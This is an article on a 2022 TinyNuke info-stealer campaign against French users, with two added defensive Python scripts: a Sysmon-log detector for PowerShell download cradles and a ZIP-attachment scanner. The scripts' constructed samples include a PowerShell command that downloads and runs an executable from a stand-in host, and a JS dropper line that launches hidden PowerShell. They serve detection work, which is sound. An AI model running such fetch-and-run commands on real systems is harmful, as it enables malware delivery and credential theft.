French users attacked by the info-stealing malware TinyNuke again

January 22, 2022
France Cyberattack Info-Stealing Malware TinyNuke

TinyNuke, an info-stealing malware, has reappeared in the wild with new campaigns aimed at French users, the second time the malware has been turned against France. The emails use invoice-themed lures and are sent to corporate addresses and to employees in the business, technology, manufacturing and construction sectors.

The renewed campaign aims to exfiltrate credentials and other confidential data and to install further payloads on infected machines.

TinyNuke first surfaced in 2017, peaked in 2018, saw reduced activity in 2019 and had almost disappeared by 2020. According to the security researchers tracking its return, the reappearance consists of two separate sets of operations, each with its own command-and-control infrastructure, payloads and lure mechanics.

The researchers suggest that these two separate operations may also mean that two distinct threat actors are using the malware.

The TinyNuke payload that attacked French users was hosted on legitimate websites.

TinyNuke's operators compromise legitimate French websites to host the payload, and the executables are disguised as benign software. The latest campaigns use Tor for command-and-control communications, the same technique seen in 2018.

In the recent campaigns the emails carry URLs that download ZIP archives. Each archive contains a JavaScript file which, when run, launches PowerShell commands to download and execute TinyNuke. In terms of capabilities, TinyNuke can steal credentials through web injects for Chrome, Firefox and Internet Explorer, capture them with form grabbing, and install additional payloads.
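One way to catch this chain on the endpoint, as an added example that is not from the original report or from the researchers who tracked the campaign: the script below scans Sysmon-style process-creation records and flags PowerShell launched by a Windows script host (the .js stage) with a download cradle on its command line. The JSON-lines log format, the sample events and the cradle keyword list are assumptions made for this illustration, not indicators published with the campaign.

```python
"""Detect the ZIP -> .js -> PowerShell download chain in process-creation
telemetry. Added example, not from the original report; the Sysmon-style
JSON-lines format and the sample events below are constructed."""
import json
import re

# Windows script hosts that would run a .js dropped from a ZIP lure.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}

# PowerShell images; x86 and x64 installs end in the same file name.
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Download-and-run primitives that typically appear in a cradle command line
# (assumed list; extend it from your own telemetry).
CRADLE_PATTERNS = [re.compile(p, re.IGNORECASE) for p in (
    r"downloadstring",
    r"downloadfile",
    r"invoke-webrequest|\biwr\b",
    r"net\.webclient",
    r"start-bitstransfer",
    r"invoke-expression|\biex\b",
    r"-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}",   # -enc <base64 payload>
)]

# Constructed Sysmon EventID 1 style records, one JSON object per line.
SAMPLE_LOG = r"""
{"EventID":1,"Image":"C:\\Windows\\System32\\wscript.exe","ParentImage":"C:\\Windows\\explorer.exe","CommandLine":"wscript.exe C:\\Users\\jd\\Downloads\\facture_2022.js"}
{"EventID":1,"Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentImage":"C:\\Windows\\System32\\wscript.exe","CommandLine":"powershell -w hidden -nop -c \"(New-Object Net.WebClient).DownloadFile('http://example.invalid/x.exe','C:\\Users\\jd\\AppData\\Local\\Temp\\x.exe'); Start-Process 'C:\\Users\\jd\\AppData\\Local\\Temp\\x.exe'\""}
{"EventID":1,"Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentImage":"C:\\Windows\\explorer.exe","CommandLine":"powershell Get-ChildItem C:\\Temp"}
{"EventID":1,"Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentImage":"C:\\Windows\\explorer.exe","CommandLine":"powershell -nop -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"}
{"EventID":1,"Image":"C:\\Windows\\System32\\notepad.exe","ParentImage":"C:\\Windows\\explorer.exe","CommandLine":"notepad.exe report.txt"}
"""


def basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def has_download_cradle(cmdline):
    """True if any download-and-run primitive appears on the command line."""
    return any(p.search(cmdline) for p in CRADLE_PATTERNS)


def parse_events(text):
    """Parse JSON-lines telemetry into a list of event dicts."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def find_suspicious_chains(events):
    """Rank PowerShell process creations.

    high:   PowerShell spawned by a script host with a download cradle
            (the chain the article describes)
    medium: PowerShell spawned by a script host, no cradle matched
            (the cradle may sit in a file or an encoding not matched here)
    low:    download cradle under any other parent
    """
    hits = []
    for ev in events:
        if ev.get("EventID") != 1 or basename(ev.get("Image", "")) not in POWERSHELL:
            continue
        parent = basename(ev.get("ParentImage", ""))
        cmd = ev.get("CommandLine", "")
        cradle = has_download_cradle(cmd)
        if parent in SCRIPT_HOSTS:
            severity = "high" if cradle else "medium"
        elif cradle:
            severity = "low"
        else:
            continue
        hits.append({"severity": severity, "parent": parent, "cmdline": cmd})
    return hits


if __name__ == "__main__":
    for hit in find_suspicious_chains(parse_events(SAMPLE_LOG)):
        print(f"[{hit['severity']}] parent={hit['parent']} cmd={hit['cmdline'][:80]}")
```

The parent-child relationship is the durable signal here: lure file names and download hosts change between campaigns, but a script host spawning PowerShell on a workstation is rare enough in most estates to be worth an alert on its own, which is why it is scored medium even when no cradle keyword matches.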

Although the current attacks use particular lures, the threat actors could easily change the phishing messages presented to their targets.

Furthermore, if new actors are found to be using TinyNuke as well, experts believe it would indicate that the malware's developer is selling it on dark web markets.

TinyNuke's deployment could therefore grow well beyond its previous levels, and the range of email lures used against users could become broader than in earlier years.

It is vital to stay vigilant and to avoid clicking on attached URLs or embedded buttons that can lead to malicious sites hosting a compressed executable or script. Because a freshly built sample may not yet be caught by AV signatures, users should treat unexpected emails with caution rather than rely on the scanner alone.
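Since the advice above comes down to not running the contents of an unexpected ZIP, a mail gateway or download proxy can enforce it before a user ever sees the link. The following is an added example written for this page, not code from the original article or from the researchers: it opens an archive in memory, without extracting it, and reports members that are Windows script files or PE executables regardless of the name they carry. The archive contents, extension list and size limit are constructed assumptions.

```python
"""Gateway-style check for the ZIP lure described above: open an attached
archive in memory, without extracting it, and report members that are
Windows script files or PE executables regardless of what their name claims.
Added example, not from the original article; the archive is constructed."""
import io
import zipfile

# Extensions Windows hands to a script host or loader on double-click
# (assumed list; tune it to your environment).
ACTIVE_EXTENSIONS = {
    ".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".hta",
    ".ps1", ".cmd", ".bat", ".lnk", ".scr", ".exe", ".dll", ".msi",
}
MAX_MEMBER_BYTES = 50 * 1024 * 1024   # do not read members larger than this


def risky_members(zip_bytes):
    """Return [(member name, [reasons])] for every member worth blocking."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            lower = info.filename.lower()
            parts = lower.rsplit("/", 1)[-1].split(".")
            ext = "." + parts[-1] if len(parts) > 1 else ""
            reasons = []
            if ext in ACTIVE_EXTENSIONS:
                reasons.append(f"active extension {ext}")
                if len(parts) > 2:   # e.g. facture.pdf.js
                    reasons.append("double extension")
            if info.flag_bits & 0x1:   # bit 0 set: encrypted, cannot be inspected
                reasons.append("encrypted member")
            elif info.file_size > MAX_MEMBER_BYTES:
                reasons.append("oversized member")
            else:
                with zf.open(info) as fh:
                    if fh.read(2) == b"MZ":   # DOS/PE header, whatever the name
                        reasons.append("PE header")
            if reasons:
                findings.append((info.filename, reasons))
    return findings


def build_sample_zip():
    """Constructed lure: a double-extension JS dropper, a benign note and a
    renamed executable."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("Facture_2022-01.pdf.js",
                    "var sh = new ActiveXObject('WScript.Shell');\n"
                    "sh.Run('powershell -w hidden -nop', 0);\n")
        zf.writestr("Lisez-moi.txt", "Veuillez trouver ci-joint votre facture.\n")
        zf.writestr("viewer.dat", b"MZ\x90\x00" + bytes(60))
    return buf.getvalue()


if __name__ == "__main__":
    for name, reasons in risky_members(build_sample_zip()):
        print(f"BLOCK {name}: {', '.join(reasons)}")
```

Two points a practitioner would add in production: a password-protected member is reported as encrypted rather than silently passed, because a lure that hides behind a password in the email body is still a lure; and a nested archive (a .zip inside the .zip) should be fed back through the same function, since droppers routinely use one extra layer to slip past a single-level check.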
